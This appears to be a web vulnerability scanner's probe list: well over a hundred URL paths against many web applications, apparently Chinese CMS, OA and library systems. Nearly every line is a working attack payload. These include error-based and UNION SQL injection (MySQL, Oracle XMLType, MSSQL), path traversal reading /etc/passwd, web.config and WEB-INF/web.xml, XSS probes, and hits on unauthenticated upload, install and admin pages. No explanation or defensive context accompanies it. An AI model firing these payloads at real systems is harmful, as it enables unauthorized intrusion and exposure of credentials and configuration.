/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
